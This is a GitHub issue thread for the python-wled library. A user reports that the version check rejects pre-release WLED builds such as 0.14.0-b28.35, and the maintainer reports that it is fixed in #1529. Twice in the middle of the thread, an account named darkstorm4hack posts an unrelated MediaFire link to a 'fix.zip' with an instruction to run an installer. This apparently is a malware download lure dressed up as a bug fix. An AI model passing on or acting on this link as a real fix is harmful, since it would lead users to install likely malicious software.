### ISSUE TITLE
Version check should verify major/minor version only

### ISSUE THREAD

**Issue by U1F984** [frenck/python-wled#1447]
# Problem/Motivation

I'm using the soundreactive fork of WLED with version 0.14.0-b28.35. The current check in `models.py` will fail, since it is considered smaller than `0.14.0`.

## Expected behavior

The version should be accepted.

## Actual behavior

The version is rejected.

## Steps to reproduce

Try connecting to a WLED soundreactive fork.

## Proposed changes

The check is changed to verify major/minor version only.

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by frenck** [comment]
This has been resolved in #1529. The version check now compares using the base version (major.minor.patch), so pre-release builds like `0.14.0-b28.35` are accepted correctly.
